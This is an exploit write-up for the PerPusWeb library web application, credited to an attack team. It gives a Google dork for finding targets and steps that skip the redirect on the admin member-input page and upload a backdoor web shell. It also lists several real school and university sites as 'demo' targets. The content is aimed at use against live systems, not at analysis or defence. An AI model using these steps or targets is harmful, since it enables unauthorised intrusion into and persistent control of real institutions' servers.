*************************************************** # Exploit Title: PerPusWeb Bypass Admin No Redirect # Google Dork: intext:Selamat Datang di Perpustakaan Berbasis Web (PerPusWeb) # Exploit: /admin/input-anggota.php # Date: 17/06/2018 # Author: 0N3R1D3R # Team: Error Violence # Tested on: Windows 10 x64 *************************************************** [+] Download and install NoRedirect Add-ons in firefox ( https://addons.mozilla.org/en-US/firefox/addon/noredirect/ ) [+] Search the dork in Google [+] Open target [+] Give ^ in NoRedirect Add-ons [+] Exploit with /admin/input-anggota.php [+] Upload your backdoor with tamper data [+] Access your backdoor with ( /admin/gambar_anggota/backdoor.php ) *************************************************** [+] Demo Site [+] http://sman6kotaserang.sch.id/perpusweb/admin/input-anggota.php [+] http://45.118.112.106:8585/perpusweb/admin/input-anggota.php [+] http://perpusfree.niqoweb.com/admin/input-anggota.php [+] http://library.unkar.ac.id/admin/input-anggota.php [+] http://perpus.unimas.ac.id/admin/input-anggota.php *************************************************** Thanks To Error Violence